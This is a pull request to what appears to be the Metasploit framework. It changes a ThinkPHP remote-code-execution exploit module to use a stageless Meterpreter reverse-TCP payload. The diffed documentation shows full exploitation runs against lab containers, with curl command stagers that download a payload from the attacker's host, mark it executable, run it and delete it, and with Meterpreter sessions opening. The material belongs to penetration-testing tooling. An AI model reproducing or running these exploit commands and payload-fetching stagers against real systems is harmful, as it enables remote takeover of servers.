### PR TITLE
Use stageless payload with HTTP command stager in ThinkPHP exploit

### DIFF
--- a/documentation/modules/exploit/unix/webapp/thinkphp_rce.md
+++ b/documentation/modules/exploit/unix/webapp/thinkphp_rce.md
@@ -63,7 +63,7 @@ Module options (exploit/unix/webapp/thinkphp_rce):
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (linux/x64/meterpreter/reverse_tcp):
+Payload options (linux/x64/meterpreter_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -82,8 +82,6 @@ msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
 msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3
 lhost => 192.168.1.3
-msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor curl
-cmdstager::flavor => curl
 msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
 srvport => 8888
 msf5 exploit(unix/webapp/thinkphp_rce) > run
@@ -92,22 +90,21 @@ msf5 exploit(unix/webapp/thinkphp_rce) > run
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version.
 [*] Targeting ThinkPHP 5.0.20 automatically
-[*] Using URL: http://0.0.0.0:8888/IV0dIafe
-[*] Local IP: http://192.168.1.3:8888/IV0dIafe
-[*] Generated command stager: ["curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm"]
-[*] Executing command: curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm
-[*] Client 192.168.1.3 (curl/7.52.1) requested /IV0dIafe
+[*] Using URL: http://0.0.0.0:8888/a81nrUs9fCfJSX
+[*] Local IP: http://192.168.1.3:8888/a81nrUs9fCfJSX
+[*] Generated command stager: ["curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl"]
+[*] Executing command: curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl
+[*] Client 192.168.1.3 (curl/7.52.1) requested /a81nrUs9fCfJSX
 [*] Sending payload to 192.168.1.3 (curl/7.52.1)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3012516 bytes) to 192.168.1.3
-[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:64475) at 2020-04-13 01:02:13 -0500
-[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:55132) at 2020-05-01 04:25:29 -0500
+[+] Successfully executed command: curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl
+[*] Command Stager progress - 100.00% done (118/118 bytes)
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: no-user @ c94d71fb70ec (uid=33, gid=33, euid=33, egid=33)
+Server username: no-user @ 099b50f07ffe (uid=33, gid=33, euid=33, egid=33)
 meterpreter > sysinfo
-Computer     : 172.21.0.2
+Computer     : 172.19.0.2
 OS           : Debian 9.4 (Linux 4.19.76-linuxkit)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -118,30 +115,27 @@ meterpreter >
 ### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)
 
 ```
-msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081
-rport => 8081
 msf5 exploit(unix/webapp/thinkphp_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.3:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
 [*] Targeting ThinkPHP 5.0.23 automatically
-[*] Using URL: http://0.0.0.0:8888/zD3iTDja
-[*] Local IP: http://192.168.1.3:8888/zD3iTDja
-[*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"]
-[*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf
-[*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja
+[*] Using URL: http://0.0.0.0:8888/hVN9Y2ju
+[*] Local IP: http://192.168.1.3:8888/hVN9Y2ju
+[*] Generated command stager: ["curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn"]
+[*] Executing command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
+[*] Client 192.168.1.3 (curl/7.52.1) requested /hVN9Y2ju
 [*] Sending payload to 192.168.1.3 (curl/7.52.1)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3012516 bytes) to 192.168.1.3
-[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500
+[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:55145) at 2020-05-01 04:26:44 -0500
+[+] Successfully executed command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
 [*] Command Stager progress - 100.00% done (112/112 bytes)
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33)
+Server username: no-user @ b4be164434d3 (uid=33, gid=33, euid=33, egid=33)
 meterpreter > sysinfo
-Computer     : 172.22.0.2
+Computer     : 172.18.0.2
 OS           : Debian 9.6 (Linux 4.19.76-linuxkit)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl

--- a/modules/exploits/unix/webapp/thinkphp_rce.rb
+++ b/modules/exploits/unix/webapp/thinkphp_rce.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Type' => :linux_dropper,
             'DefaultOptions' => {
               'CMDSTAGER::FLAVOR' => :curl,
-              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
             }
           ]
         ],


### PR DESCRIPTION
This should have gone in #13242 when I "fixed" `CMDSTAGER::FLAVOR` for this module. My bad.

When using command stagers that download the payload themselves, it's better to use a stageless payload to avoid intermediate stage transfer. See any of my other modules where this is the case.

This has been retested. You may consult the module doc.

For #13240. See #12963 for the target `DefaultOptions` bug. We really need to fix that.